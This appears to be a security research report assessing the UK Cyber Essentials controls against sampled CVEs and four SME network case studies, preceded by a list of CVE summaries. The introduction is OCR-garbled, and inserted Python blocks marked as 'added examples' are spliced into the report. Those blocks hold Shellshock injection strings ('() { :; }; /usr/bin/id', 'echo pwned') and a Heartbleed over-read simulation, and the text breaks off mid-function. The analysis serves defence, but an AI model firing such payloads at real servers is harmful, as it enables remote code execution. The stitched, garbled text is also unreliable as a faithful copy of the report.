CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses


IntroductionC

yber Essentials was introduced asa government funded scheme firstpublished in April 2014 as an interest

of national security to bolster UK securityin cyberspace The Cyber Essentialsscheme was developed in collaboration withthe Information Assurance for Small andMedium Enterprises (IASME) consortiumthe Information Security Forum (ISF) andthe British Standards Institution (BSI) as aset of basic technical security controls fororganisations to utilize for the mitigation ofthe lsquobottom 80rsquo of remote cyber-threats[3]

The scheme built to provide animplementable of the 10-steps to Cyber-Security[1] was released as part of the2011 UK Cyber Security Strategy[16] andis being backed by the UK government asan organisational standard Thus far it hasbeen adopted by several large organisationsincluding Vodafone Hewlett-Packard (HP)BAE Systems Virgin Media and Barclays[5]

The Cyber Essentials accreditation hasbeen made mandatory from October 1st

2014 for all suppliers of government contractsinvolving ldquothe handling of sensitive andpersonal information and provision of certaintechnical products and servicesrdquo[17]

The Cyber Essentials security controls aresummarised as follows[7]

Firewalls and GatewaysThese are devices designed to preventunauthorised access to or from privatenetworks but good setup of thesedevices either in hardware or softwareform is important for them to be fullyeffective

Secure configurationEnsuring that systems are configured inthe most secure way for the needs ofthe organisation

Access controlEnsuring only those who should haveaccess to systems to have access and atthe appropriate level

Malware protectionEnsuring that virus and malwareprotection is installed and is it up todate

Patch managementEnsuring the latest supported version ofapplications is used and all the necessarypatches supplied by the vendor beenapplied

Figure 2 Cyber Essentials Security Tools

The intended scope of Cyber Essentialsis outlined in the Cyber Essentials SchemeAssurance Framework[10] This states thatthe CE controls are considered as applicableto all sizes of Enterprise as a base level ofprotection against cyber-attacks upon whichindividual organisations may build on withfurther tools network devices or protocols forthe mitigation of targeted attacks The CEScheme is clear in its inclusion of lsquoBring your

own Devicersquo network setups to scope as wellas Cloud-based services and off-the-shelf webapplications Bespoke IT systems such as inmanufacturing and retail are applicable to CEbut hold additional vulnerabilities due to theirnature that are not to be considered

Aims

The purpose of this report is to investigatethe effectiveness of the Cyber Essentialscontrols in mitigating lsquocommodity-levelrsquoattacks attempting to exploit vulnerabilitiesin Small and Medium Enterprise (SME)networks

A commodity-level attack has been definedby CESG[8] as

Any unauthenticated remote attackexploiting a known vulnerability withthe use of tools and techniques openlyavailable for download or purchaseon the internet - and that do notrequire extensive specialist knowledge toconduct1

To effectively assess Cyber Essentials it is first necessary to understand the typical network configurations of SMEs. Interviews with SMEs were carried out to build abstracted network models, and a survey has been conducted to build a broader picture of SME network deployments. The survey results help to develop our understanding of current security practice and cyber-awareness, as well as to build a general-case SME network with which to analyse the typicality of the SMEs interviewed.

The networks modelled from collected data are considered with and without the use of the Cyber Essentials security controls, to comparatively establish the protection granted by adoption of the CE scheme.

¹ This includes attacks utilising pen-testing software such as Metasploit, Kali and the Poison Ivy remote access tool, which are capable of scanning network nodes for publicly known vulnerabilities in the operating system, applications or services in use.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster. Page 3 of 28

Methodology

The scheme of work for this report has been split into the following sections:

• Collection of data through interviews and a survey regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper models to be analysed.

• Composition of a list of suitable vulnerabilities that contains applicable methods by which remote attackers can carry out commodity-level attacks.

• Assessment of vulnerability mitigation for SME networks with and without the use of the CE Tools.

Data Collection

In order to analyse the effectiveness of the Cyber Essentials Security Tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.

Interviews

The interviews were composed with the goal of first understanding the layout, or topology, of the network deployed by an SME. To then build on the network configuration it was important to understand how the network is used: where remote connections take place, how local services are utilised, and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.

Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches, and how often updates are rolled out.

Survey

The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included details of the number of workstations at the SME (to gauge its size), the local and remote services available, the operating systems used on the servers and workstations, the current security policies in place, and the respondents' awareness of the CE Scheme.

Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster[9], and another circulated to closed groups of security-interested SME representatives.

Vulnerabilities

A total of 200 vulnerabilities have been taken at random, in equal numbers, from the two annual vulnerability lists (CVE-2013 and CVE-2014) published by Mitre.² Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.

In this report we use the Mitre.org definition of a vulnerability, which states:

An information security "vulnerability" is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely "open" security policies in which all users are trusted, or where there is no consideration of risk to the system).

(As shown on Mitre.org's Terminology page[6] in March '15.)

² CVE is sponsored by US-CERT in the Office of Cybersecurity and Communications at the US Department of Homeland Security.

Figure 3: Methodology for Assessing Cyber Essentials

To warrant a CVE entry in the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data that is contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity; or

• allows an attacker to conduct a denial of service.

High-Profile Vulnerabilities

Three specific high-profile vulnerabilities were also taken in addition to the randomly chosen 200, and have been assessed for the extent to which the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with their respective potential to harm operations.

Mitigation Assessment

The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated, or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use, or likely in use (based on the SME's practice), are deemed applicable to the network.
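The applicability rule above can be applied mechanically when CVE records carry CPE names for the affected products. The following Python is an added example (not part of the report or its data): it implements the report's two rules against a constructed CVE sample and a constructed inventory loosely shaped on the SME-2 case study, and tallies the analyst's mitigation judgements over the applicable subset. The CVE identifiers, CPE names, inventory entries and status values are all invented for illustration.

```python
"""Applicability and mitigation tally for a CVE sample against an SME asset
inventory, following the rules the report states: a hardware CVE applies if
the SME uses any hardware from the same vendor; a software (application or
OS) CVE applies only if that product is in use.

Added example, not part of the report. The CVE sample and inventory below are
constructed, not real data.
"""
from collections import Counter

# Constructed CVE sample. 'cpe' is a CPE 2.3 formatted name
# (cpe:2.3:part:vendor:product:version:...); 'status' is the analyst's
# judgement with the CE controls applied, using the report's three classes.
SAMPLE_CVES = [
    {"id": "CVE-EXAMPLE-0001",
     "cpe": "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*",
     "status": "mitigated"},
    {"id": "CVE-EXAMPLE-0002",
     "cpe": "cpe:2.3:h:tp-link:tl-wr841n:-:*:*:*:*:*:*:*",
     "status": "not_mitigated"},
    {"id": "CVE-EXAMPLE-0003",
     "cpe": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*",
     "status": "partial"},
    {"id": "CVE-EXAMPLE-0004",
     "cpe": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*",
     "status": "mitigated"},
    {"id": "CVE-EXAMPLE-0005",
     "cpe": "cpe:2.3:h:cisco:asa_5505:-:*:*:*:*:*:*:*",
     "status": "mitigated"},
]

# Constructed inventory in the shape of the SME-2 case study: TP-Link
# switches and router, Windows clients, a server running OpenSSL.
# Tuples are (part, vendor, product) in CPE terms: h = hardware,
# o = operating system, a = application.
SME2_INVENTORY = {
    ("h", "tp-link", "tl-sg108"),
    ("h", "tp-link", "tl-wr940n"),
    ("o", "microsoft", "windows_7"),
    ("o", "microsoft", "windows_8"),
    ("a", "openssl", "openssl"),
}


def parse_cpe(cpe):
    """Return (part, vendor, product) from a CPE 2.3 formatted string.
    Escaped colons inside fields are not handled; none occur in the sample."""
    fields = cpe.split(":")
    if len(fields) < 5 or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError("not a CPE 2.3 name: %r" % cpe)
    return fields[2], fields[3], fields[4]


def is_applicable(cve, inventory):
    """Apply the report's applicability rules to one CVE record."""
    part, vendor, product = parse_cpe(cve["cpe"])
    if part == "h":
        # Hardware rule: any like-product from the same vendor counts.
        return any(p == "h" and v == vendor for p, v, _ in inventory)
    # Software rule: the specific product must be in use.
    return (part, vendor, product) in inventory


def assess(cves, inventory):
    """Return (list of applicable CVE ids, Counter of status over them)."""
    applicable = [c for c in cves if is_applicable(c, inventory)]
    tally = Counter(c["status"] for c in applicable)
    return [c["id"] for c in applicable], tally


if __name__ == "__main__":
    ids, tally = assess(SAMPLE_CVES, SME2_INVENTORY)
    print("applicable:", ids)
    print("tally:", dict(tally))
```

Run against the constructed data, the TP-Link router CVE is applicable through the same-vendor rule even though the exact model is not in the inventory, the Cisco one is not, and the Internet Explorer CVE is excluded because the software rule requires the product itself to be present.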


Analysis

The analysis of data collected has been split into sections. First, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in software and hardware used for each SME network configuration is included.

The full table of the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector as well as the overall typical configuration of SMEs.

Full Vulnerabilities Assessment

Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials Security Tools, 61 were partially mitigated and 8 were not mitigated.

Figure 4: Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated. 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, and will be mitigated once a security fix has been released. Whatever level of security tools is deployed on a network, the security of third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to respond quickly to security flaws as they become apparent, with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or whether more suitable and potentially more secure solutions are available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In such a case website blacklisting is the only defence against the vulnerabilities.

Not Mitigated - Secure Configuration. Some vulnerabilities have been found to be unmitigable using the CE controls; in each of the cases found this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For devices that are fundamentally flawed from a cyber-security standpoint, no level of security tools on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.

Case Studies

Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.

SME Network One - Finance Sector

Physical Infrastructure. The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5: SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com 1000BASE-T switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services. At the head office site a Windows file server (Samba) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, and has firewall rules in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.


User Access. Employees are permitted to access the internet from both their individual workstations and additional devices such as smartphones (technically this is not permitted by policy, but the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to happen, with users generally using their own machines.

Operating systems. Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it is placed in the firing line for a large number of browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, the SME ends up with several different browsers, with several versions of each, to cover all their requirements, exposing it multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places it in a position where any SSL vulnerabilities affect it too.

SME Network Two - Specialist Group

Physical Infrastructure. The second SME participant employs 20-25 people based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.

Network equipment includes an external Dell PowerEdge server, four TP-Link switch/access points and a TP-Link DHCP router.

Figure 7: SME-2 Network

Services. Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows XP, Windows 7 and Windows 8, with auto-updates enabled. Note that Windows XP left extended support in April 2014, so auto-updates no longer deliver security fixes to those machines; under the patch management control they count as unsupported software.

Some employees use a VPN to connect to another network for a data service. All other services (email, files and database, as well as management tools) are provided by cloud servers via HTTPS, and are used daily.

User Access. Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest overall potential vulnerabilities, largely owing to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in the network, responsibility is handed to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.

SME Network Three - Web Development

Physical Infrastructure. SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge server, one TP-Link switch/access point and a TP-Link DHCP router.

Figure 9: SME-3 Network

Services. Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows 7 and Windows 8, with auto-updates enabled.

All services (email, files and database, as well as management tools) are provided by cloud servers via HTTPS, and are used daily.

User Access. Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and cloud service access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.

Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place: when working on alternative browsers, employees should only access client pages where the developer has control of the web content.

SME Network Four - Hotel Services

Figure 11: SME-4 Network

Physical Infrastructure. This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names (SSIDs) filtering traffic into a separate VLAN internal to the router.

Services. No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (mainly HTTPS).

User Access. User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems. The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures. Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do, however, have automatic patch installation configured and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, and so is exposed to a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use may not have either, leaving them open to attack.

Survey Responses

Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure. The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services. Local: file, email, database and domain servers are the most common local service providers, each present in more than a third of SMEs. Remote: email, web hosting and file sharing are the most common services provided remotely.

User Access. More than half of SMEs permit employees' own devices to be used in the workplace. For organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine exposes the whole company.

Existing Security Measures. Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these come access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents Network

The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match the majority of SME network configurations.

Locally, email and file servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.


Figure 13: Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information is likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.


Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media during 2014 and early 2015. These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

"ShellShock"

Also known by the name "Bashdoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]

The exploit allowed attackers to execute arbitrary shell commands on an affected system by supplying crafted environment variable values. The bug was not enough by itself to compromise a system: an attacker needs some service (a CGI web application, an sshd ForceCommand, a DHCP client) that passes attacker-controlled values into Bash's environment. Wherever that holds, however, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services, mail servers as an example, as they would potentially have no idea that they had been compromised.
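To make the "crafted environment across a privilege boundary" concrete, the following Python is an added example, not from the report. It builds the CGI environment that a gateway such as mod_cgi derives from an HTTP request (the HTTP_* meta-variable mapping of RFC 3875), flags values that have the function-export shape Bash would parse, scans a few constructed access-log lines for the same pattern, and runs the standard local probe against whatever bash is installed. The request, host name, CGI path and log lines are all constructed; the `id` payload in the request only runs if the bash handling it is unpatched.

```python
"""Shellshock (CVE-2014-6271): how a header becomes a Bash environment
variable, how to spot attempts, and the standard local probe.

Added example, not part of the report. The request, log lines and names
below are constructed for illustration.
"""
import shutil
import subprocess

# Constructed request an attacker might send to a CGI script.
CONSTRUCTED_REQUEST = (
    "GET /cgi-bin/status.sh HTTP/1.1\r\n"
    "Host: sme-intranet.example\r\n"
    "User-Agent: () { :; }; /usr/bin/id\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

# Constructed web-server access-log lines (combined log format).
CONSTRUCTED_ACCESS_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:02 +0100] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "() { :; }; /usr/bin/id"',
    '198.51.100.9 - - [25/Sep/2014:10:01:05 +0100] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [25/Sep/2014:10:02:17 +0100] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "() { ignored; }; echo pwned" "curl/7.37"',
]


def cgi_env_from_request(raw):
    """Map request headers to CGI meta-variables the way a CGI gateway does
    ('Header-Name' -> HTTP_HEADER_NAME). This is the step that lets an
    unauthenticated remote client choose environment variable values that a
    Bash CGI script, or any Bash a script spawns, will inherit."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ")
    env = {"REQUEST_METHOD": method, "SCRIPT_NAME": target,
           "GATEWAY_INTERFACE": "CGI/1.1"}
    for line in header_lines:
        name, _, value = line.partition(":")
        env["HTTP_" + name.strip().upper().replace("-", "_")] = value.strip()
    return env


def looks_like_function_export(value):
    """Unpatched Bash treated any variable whose value begins with '() {' as
    an exported function definition and kept parsing after the closing
    brace, executing whatever followed at startup."""
    return value.lstrip().startswith("() {")


def scan_access_log(lines):
    """Return the 1-based numbers of log lines carrying the exploit shape in
    any field. Simple substring detection; it catches the common form."""
    return [i for i, line in enumerate(lines, 1) if "() {" in line]


def probe_bash():
    """Run the installed bash with a function-shaped variable and a harmless
    command. Returns 'vulnerable' if the trailing payload ran, 'patched' if
    only the intended command ran, or 'no-bash' when bash is absent."""
    bash = shutil.which("bash")
    if bash is None:
        return "no-bash"
    env = {"PATH": "/usr/bin:/bin",
           "HTTP_USER_AGENT": "() { :; }; echo SHELLSHOCK_MARKER"}
    out = subprocess.run([bash, "-c", "echo ok"], env=env,
                         capture_output=True, text=True).stdout
    return "vulnerable" if "SHELLSHOCK_MARKER" in out else "patched"


if __name__ == "__main__":
    env = cgi_env_from_request(CONSTRUCTED_REQUEST)
    print("HTTP_USER_AGENT =", env["HTTP_USER_AGENT"])
    print("function-export shape:", looks_like_function_export(env["HTTP_USER_AGENT"]))
    print("suspicious log lines:", scan_access_log(CONSTRUCTED_ACCESS_LOG))
    print("local bash:", probe_bash())
```

The probe is the same check that circulated when the bug was published: if `SHELLSHOCK_MARKER` appears in the output, the trailing command after the function body was executed. The log scan is deliberately crude; a production detection would also decode URL-encoded and header-folded variants.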

"Heartbleed"

Appearing in April 2014, the CVE-2014-0160 (aka "Heartbleed") bug allowed attackers to read the memory of the vulnerable process (up to 64 KB per heartbeat request) through a buffer over-read. This allowed attackers to access private credentials (or indeed anything else) held in the RAM of the target process.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft[15]) estimated that up to 17% of trusted SSL-certified servers were vulnerable to the attack.
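The over-read is easier to see in a bounded simulation than in the OpenSSL source. The following Python is an added example, not the report's or OpenSSL's code: it lays a heartbeat record next to constructed "neighbouring memory" in one bytes object and contrasts a handler that trusts the peer's 16-bit payload length with the bounds check added in OpenSSL 1.0.1g. The record layout (one type byte, two length bytes, payload, at least 16 bytes of padding) and the check itself follow the real implementation; the neighbouring data is invented. Python slicing stops at the end of the simulated slab, where the real memcpy would keep reading up to 64 KB.

```python
"""Heartbleed (CVE-2014-0160) as a bounded simulation.

Added example, not from the report or OpenSSL. 'memory' below is a
constructed bytes object standing in for process memory: a heartbeat record
followed by whatever happens to sit next to it.
"""
import struct

TLS1_HB_REQUEST = 1
TLS1_HB_RESPONSE = 2
PADDING = 16  # minimum padding a heartbeat message must carry


def build_heartbeat(payload, claimed_length=None):
    """Build a heartbeat request. claimed_length lets the peer lie about the
    payload size, which is the whole attack: a tiny payload with a length
    field of up to 0xFFFF."""
    if claimed_length is None:
        claimed_length = len(payload)
    return struct.pack("!BH", TLS1_HB_REQUEST, claimed_length) + payload + b"\x00" * PADDING


def handle_vulnerable(memory, record_offset):
    """Pre-1.0.1g logic: copy 'payload_length' bytes starting at the payload
    into the response, without checking that the record holds that many."""
    hbtype, payload_length = struct.unpack_from("!BH", memory, record_offset)
    if hbtype != TLS1_HB_REQUEST:
        return None
    payload_start = record_offset + 3
    # The memcpy(bp, pl, payload) of the original: reads past the record
    # into neighbouring memory and echoes it back to the peer.
    leaked = memory[payload_start:payload_start + payload_length]
    return struct.pack("!BH", TLS1_HB_RESPONSE, payload_length) + leaked + b"\x00" * PADDING


def handle_fixed(memory, record_offset, record_length):
    """1.0.1g logic: discard the message when the claimed payload plus
    header and padding does not fit inside the record actually received."""
    hbtype, payload_length = struct.unpack_from("!BH", memory, record_offset)
    if hbtype != TLS1_HB_REQUEST:
        return None
    if 1 + 2 + payload_length + PADDING > record_length:
        return None  # silently dropped, as the fix does
    payload_start = record_offset + 3
    return (struct.pack("!BH", TLS1_HB_RESPONSE, payload_length)
            + memory[payload_start:payload_start + payload_length]
            + b"\x00" * PADDING)


def demo():
    """Return (vulnerable response, fixed response) for a lying request."""
    record = build_heartbeat(b"hi!", claimed_length=200)
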